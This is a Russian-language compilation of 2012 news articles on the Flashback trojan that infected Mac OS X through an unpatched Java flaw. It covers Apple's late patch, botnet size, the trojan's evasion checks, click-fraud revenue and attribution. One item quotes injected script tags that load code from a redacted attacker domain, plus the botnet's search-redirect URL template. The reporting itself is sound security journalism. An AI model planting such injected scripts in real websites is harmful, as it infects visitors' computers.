Менее чем через неделю после распространения трояна Flashback компания Apple выпустила патч, который закрывает Java-уязвимость в OS X. Хотя информация об этой уязвимости была опубликована ещё в феврале 2012 года, и компания Oracle сразу же выпустила патч для операционной системы Windows, но в системе OS X дыра оставалась вплоть до настоящего момента. У злоумышленников было достаточно времени, чтобы разработать надёжный эксплойт, внедрить его в популярные эксплойт-паки и проверить на миллионах пользователей Mac OS. Только спустя несколько месяцев, когда проблема приобрела широкую огласку и вышла на уровень крупнейших мировых СМИ, компания Apple всё-таки выпустила свой патч для Java. Патч доступен через механизм Software Update для всех систем с установленной Java, но может быть также скачан вручную по нижеприведённым ссылкам. Апдейты выпущены только для версий OS X 10.6 и 10.7, поскольку компания Apple официально прекратила поддержку предыдущих версий OS X. Java for Mac OS X 10.6 Update 7 Java for OS X Lion 2012-001 Патч закрывает уязвимость CVE-2012-0507, которую использует троян Flashback для проникновения в систему OS X. Кроме того, патч закрывает ряд других уязвимостей в виртуальной машине Java 1.6.0, которая после обновления меняет номер версии с 29 до 31. Пользователи OS X могут проверить текущий номер версии Java из терминала, запустив команду java –version. Соответствующая утилита находится в папке /Applications/Utilities/. Мое мнение, то ли они серьезно работают намного лучше,качественней,перспективней нежели Windows , то ли это из-за того что вирусов на данную ОС действительно мало, и тут дело времени. http://www.xakep.ru/post/58525/default.asp 04.04.2012
Apple выпустила обновление Java для Mac OS X, устраняющее уязвимости Произвести установку "заплатки" пользователи Mac OS X могут, воспользовавшись встроенным в операционную систему механизмом обновления программного обеспечения или загрузив обновления с сайта Apple. МОСКВА, 4 апр - РИА Новости, Игорь Куксов. Компания Apple выпустила обновление программной платформы Java для операционных систем OS X версий 10.6 (Snow Leopard) и 10.7 (Lion), устраняющее уязвимости в Java, которые позволяют зловредным программам получить несанкционированный доступ к компьютеру, сообщается на сайте поддержки пользователей Apple. Самая серьезная из закрытых брешей, делающая возможным запуск произвольного программного кода при посещении пользователем инфицированного веб-сайта, уже эксплуатируется троянскими программами семейства Flashback, впервые выявленными в сентябре прошлого года. Разработчик Java компания Oracle исправила эти ошибки в версиях платформы для операционных систем семейств Windows, Linux и Unix еще в феврале, распространением же обновлений Java для компьютеров Mac на базе OS X компания Apple занимается самостоятельно. В отличие от первых модификаций Flashback, выдающих себя за проигрыватель Adobe Flash Player и требующих для установки выполнения действий со стороны пользователя, последние версии зловредной программы, благодаря уязвимости в Java, имеют более эффективный механизм распространения. Запуск Flashback осуществляется Java-приложением, размещенном на зараженном сайте, после чего троянская программа запрашивает у пользователя пароль администратора. При этом инфицирование компьютера происходит и в случае, если пользователь отказался от ввода пароля - варьируется лишь дальнейшее поведение Flashback в системе. Новые модификации этой троянской программы подменяют содержимое веб-страниц, просматриваемых пользователем, сообщает компания F-Secure, специализирующаяся на информационной безопасности. Обнаруженная в феврале предыдущая версия Flashback обладала схожим функционалом, осуществляя заражение компьютера через другую уязвимость в платформе Java, для которой Apple ранее уже выпустила обновление. Произвести установку "заплатки" пользователи Mac OS X могут, воспользовавшись встроенным в операционную систему механизмом обновления программного обеспечения или загрузив обновления с сайта Apple (для OS X Lion и OS X Snow Leopard). Последняя версия операционной системы - Mac OS X Lion - не содержит Java по умолчанию, однако допускает ее установку. Среда Java позволяет создавать независящие от программно-аппаратной платформы приложения (в том числе, интегрированные с веб-службами), выполняющиеся как на клиентских компьютерах, так и на серверах. По данным Oracle, Java используется более чем на 800 миллионах персональных компьютеров по всему миру. 04/04/2012 15:11 http://digit.ru/it/20120404/390708379.html
Троян Flashback не заражает программистов В среду антивирусная компания Dr.Web опубликовала исследование с оценкой размера ботнета, состоящего из компьютеров Macintosh, заражённых трояном Flashback. Таких уже более 550 тысяч. Самому крупному ботнету в истории OS X удалось поразить более 1% всего парка Macintosh-компьютеров в мире. Что ещё интереснее, специалисты Dr.Web привели некоторые факты о том, как работает Flashback. Любопытно: он проверяет наличие на компьютере ряда антивирусных программ и некоторых систем мониторинга. Если какая-то из них присутствует, то троян немедленно удаляет себя с компьютера. Таким образом, достаточно установить на компьютере программу Avast, Clam Antivirus, Little Snitch или HTTP Scoop — и вы уже защищены от трояна Flashback, даже если не запускаете программу. Смешно также посмотреть на программы, которых не боится Flashback, то есть которые отсутствуют в его «чёрном списке». Например, среди них отсутствуют известные антивирусные программы вроде Norton Antivirus, McAfee VirusScan и F-Secure. Выглядит так, словно авторы троянской программы совершенно не опасаются, что антивирусные программы могут их обнаружить, или они невысокого мнения о квалификации пользователей, которые пользуются этим ПО. Из описания Dr.Web: Если какой-то из этих компонентов обнаружен, то программа прерывает стандартный процесс установки. В этом списке следует отметить присутствие Xcode — инструментария разработки приложений под Mac OS X и Apple iOS. Его присутствие на компьютере, очевидно, является индикатором технической продвинутости пользователя, с которым лучше не связываться. Дата: 09.04.2012 http://www.xakep.ru/post/58544/
Apple работает над патчем для Mac OS, блокирующим троянца Flashback Спустя несколько дней после того, как российские антивирусные компании "Доктор Веб" и "Лаборатория Касперского" предупредили об активности вредоносного кода Flashback (Flashfake), компания Apple начала работу над встроенным в Mac OS X исправлением, блокирующим возможность работы этого вредоноса. Согласно сообщению Apple, компания не только работает над самим исправлением, но и связывается с интернет-провайдерами, в сетях которых присутствуют признаки наличия командных серверов Flashback. На данный момент бесплатные утилиты для диагностики Flashback есть как на сайте "Доктор Веб", так и на сайте "Лаборатории Касперского". В Apple не сообщили, когда именно можно ожидать появления "родного" фикса под Mac OS для блокировки опасного вредоносного кода. Ранее антивирусные компании предупредили, что Flashback инфицировал уже более 650 000 компьютеров Mac, что сделало его крупнейшей эпидемией в истории Apple. Заражение троянцем Flashback осуществляется с использованием инфицированных сайтов и промежуточных TDS (Traffic Direction System, систем распределения трафика), перенаправляющих пользователей Mac OS X на вредоносный сайт. Таких страниц специалистами было выявлено достаточно много — все они содержат Java-скрипт, загружающий в браузер пользователя Java-апплет, который, в свою очередь, содержит эксплойт. По информации из некоторых источников на конец марта в выдаче Google присутствовало более 4 млн. зараженных веб-страниц. Кроме того, на форумах пользователей Apple сообщалось о случаях заражения троянцем Flashback при посещении сайта dlink.com. Начиная с февраля 2012 года злоумышленники начали использовать для распространения вредоносного ПО уязвимости CVE-2011-3544 и CVE-2008-5353, а после 16 марта они стали применять другой эксплойт (CVE-2012-0507). Исправление для данной уязвимости корпорация Apple выпустила только 3 апреля 2012 года. Эксплойт сохраняет на жесткий диск инфицируемого «мака» исполняемый файл, предназначенный для скачивания полезной нагрузки с удаленных управляющих серверов и ее последующего запуска. (03:27) 11.04.2012 http://cybersecurity.ru/crypto/148498.html
Ботнет Flashback резко сдулся за пару дней Антивирусная компания Symantec сегодня сообщила о том, что за последние несколько дней количество компьютеров Mac, инфицированных троянцем Flashback значительно сократилось. По состоянию на вечер среды антивирусная компания насчитала примерно 270 000 зараженных Mac, против пикового значения в более чем 600 000, зафиксированного 6 апреля. Лаям Мирчу, директор по операционной деятельности Symantec Responce Team, говорит, что снижение количества ботов объясняется несколькими факторами. В частности выпуском официального патча для среды Java, поставляемой под Mac OS X, выпуском бесплатных антивирусных инструментов сразу несколькими компаниями, а также широким освещением новости о Flashback в интернете. Мирчу говорит, что по его мнению в ближайшие дни размер базы компьютеров, зараженных Flashback продолжит сокращаться. При этом, он признал, что сейчас крайне мало информации о том, в чьих интересах работал данный троянец и что именно стало причиной сокращения размера ботнета. На сегодняшний день известно, что один из модулей вредоноса занимается подменой поискового трафика, показывая пользователю ложные результаты при использовании поисковых систем. Таким образом, злоумышленники зарабатывают деньги на «кликах». Однако в зависимости от целей преступников помимо перехвата поискового трафика они могут загружать на зараженные компьютеры и другие вредоносные модули, предназначенные для рассылки спама, кражи персональной информации, включая логины и пароли от систем онлайн-банкинга. Основным способом заражения в марте 2012 стала эксплуатация уязвимостей в Java. Авторы Flashback используют различные сайты в Сети, при обращении к которым происходит автоматическая загрузка и запуск вредоносного файла на компьютере пользователя. Стоит отметить, что наибольшее количество заражений было зафиксировано в США (300 917), Канаде (94 625) и Великобритании (47 109), где традиционно широко распространена продукция компании Apple. При этом Россия и страны СНГ оказались практически не затронуты в ходе глобальной эпидемии и были отмечены в отчете аналитиков всего несколькими десятками ботов. «Данный инцидент является самым масштабным за всю историю компании Apple и свидетельствует о том, что количество Mac-пользователей уже достигло необходимой «критической массы», чтобы привлечь внимание вирусописателей, интерес которых к этой платформе со временем будет только расти, – уверен Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского». – На сегодняшний день в наших антивирусных базах содержится информация о примерно четырехстах вредоносных программах для Mac OS. При этом более 70 из них было обнаружено за последние три месяца». (01:28) 13.04.2012 http://cybersecurity.ru/crypto/148702.html
Apple разослала обновление для удаления Flashback Компания Apple выпустила обновление для Java, задача которого, - удалить троян Flashback с компьютеров под управлением операционной системы Mac OS X. Обновление борется с "самыми распространенными разновидностями" вредоносной программы, говорится в описании на сайте Apple. Обновление рекомендуется установить всем владельцам "маков" с Java. "Вес" обновления - более 65 мегабайт. Для повышения защиты обновление отключает автоматическое исполнение в браузере Java-апплетов. Включить функцию можно в настройках. Заражение компьютера трояном происходит через уязвимость в Java при посещении вредоносного сайта. Инфицированные компьютеры объединяются в ботнет. По оценкам экспертов, по состоянию на 4 апреля было заражено свыше 600 тысяч "маков". В связи с ситуацией вокруг Flashback многие раскритиковали Apple за неоперативность. Об уязвимости было известно с февраля, однако компания "закрыла" ее только 3 апреля. Крупные антивирусные компании выпустили инструменты для избавления от трояна за несколько дней до выхода "официального" обновления. 14/04/2012 11:56 http://support.apple.com/kb/HT5242 http://uinc.ru/news/sn17611.html
Flashback приносит пару тысяч долларов Эксперты компании Symantec разъяснили схему заработка владельцев ботнета Flashback, а также сделали примерную оценку их ежедневного дохода. Напомним, что ботнет Flashback контролировал в пике до 600 тыс. компьютеров Macintosh, хотя сейчас это число значительно уменьшилось. Бóльшая часть заражённых компьютеров находится в Западной Европе и США, установка трояна OSX.Flashback.K осуществлялась через сайты на Wordpress и Joomla, где внедрялись соответствующие скрипты: <script src="[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script> <script src="[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script> По оценке Symantec, доходы владельцев ботнета Flashback составляет несколько тысяч долларов в сутки. Монетизация осуществляется путём установки на заражённые машины модулей для подмены поисковых результатов Google и фальшивых переходов по контекстной рекламе. Как говорят эксперты, программа работает весьма грамотно: она загружается с браузером Safari/Chrome/Firefox, отслеживает все запросы GET и POST и ожидает, когда пользователь осуществит поисковый запрос в Google. Если сделан подходящий запрос, то модуль перенаправляет его на свой сервер. http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION] Ниже приведён фрагмент кода, который приходит в ответ на поисковый запрос [toys]. Красным выделен URL, по которому осуществляется редирект браузера и цена за фальшивый клик (0,8 цента). После получения этой команды браузер выполняет следующий скрипт и осуществляет редирект: Трояны, которые зарабатывают на фальшивых кликах по контекстной рекламе, встречались и раньше. По оценке экспертов, ботнет из 25000 машин может приносить владельцу до $450 в день. Исходя из максимального размера ботнета Flashback в 600K машин, заработок его владельцев в какой-то момент мог достигать $10800 в день, а сейчас сократился до пары тысяч долларов. Дата: 02.05.2012 http://www.xakep.ru/post/58637/
Вирус Flashback для компьютеров Mac мог быть написан русскими хакерами Троянская программа Flashback была обнаружена в апреле этого года специалистами российской антивирусной компании «Доктор Веб». Эксперты выяснили, что ею были заражены около 700 тысяч компьютеров Mac, которые до этого случая считались практически неуязвимыми для вредоносного ПО. МОСКВА, 5 июл — РИА Новости. Троянец Flashback, обнаруженный весной и заразивший около 700 тысяч компьютеров Mac, мог быть написан хакером из России, сказал РИА Новости ведущий антивирусный эксперт российской компании «Лаборатория Касперского» Сергей Голованов. Троянская программа Flashback была обнаружена в апреле этого года специалистами российской антивирусной компании «Доктор Веб». Эксперты выяснили, что ею были заражены около 700 тысяч компьютеров Mac, которые до этого случая считались практически неуязвимыми для вредоносного ПО. Эксперты различных антивирусных компаний провели всесторонний анализ нового вируса. В «Лаборатории Касперского» отметили сходство некоторых элементов Flashback c MacDefender — другой вредоносной программой для Mac, написанной русскими хакерами. «MacDefender, написана практически также. Там были использованы примерно такие же техники шифрования строчек кода, что и в Flashback», — рассказал РИА Новости Сергей Голованов. Голованов отметил, что утверждение о российском происхождении Flashback — это предположение, основанное на ряде признаков. Твердых доказательств, позволяющих назвать Flashback российским троянцем, все же нет. Эксперты российских и зарубежных антивирусных компаний сходятся во мнении, что MacDefender — фальшивый антивирус, который в 2011 году вымогал у пользователей Mac деньги в обмен на защиту от несуществующих вирусов, был написан русскими киберпреступниками. Западные эксперты, в частности независимый эксперт по информационной безопасности Брайан Кребс, утверждали, что за эпидемией MacDefender стоят русские хакеры, аргументируя это тем, что несколько серверов, на которых злоумышленники разместили сайты для вымогательства денег с помощью MacDefender, были зарегистрированы на электронный адрес одного из сотрудников процессинговой компании ChronoPay. Ее бывший генеральный директор Павел Врублевский сейчас является обвиняемым по делу о Ddos-атаках на платежную систему Assist в 2010 году. Брайан Кребс, а также ряд других экспертов по информационной безопасности считают, что и сам Врублевский и компания ChronoPay тесно связаны с миром киберпреступности. В ChronoPay такие обвинения отрицают, отмечая, что процесс регистрации доменных имен и аренды серверов позволяет указать любой адрес электронной почты. По данным российской компании Group-IB, занимающейся расследованиями киберпреступлений, в 2011 году российские хакеры заработали не менее 2,3 миллиарда долларов. Троянская программа Flashback сегодня является наиболее масштабной угрозой безопасности пользователей компьютеров от компании Apple. В отличие от большинства предыдущих угроз для Mac, установка программы в систему проходила без всякого участия пользователя. Заразив компьютер, троянец отправлял злоумышленнику данные о его владельце, а также мог подменять результаты поисковых запросов в браузере Safari. Таким образом, злоумышленники пытались заработать на переходах ничего не подозревающих пользователей по рекламным ссылкам, размещенным хакерами в списке результатов поиска. Сумма, заработанная хакерами таким образом, неизвестна. Apple закрыла уязвимость, позволявшую Flashback заражать компьютеры Mac, вскоре после обнаружения ботсети из Flashback, однако антивирусные эксперты считают, что это далеко не последняя опасная вредоносная программа, направленная против компьютеров Mac. 05.07.2012 http://digit.ru/technology/20120705/393116329.html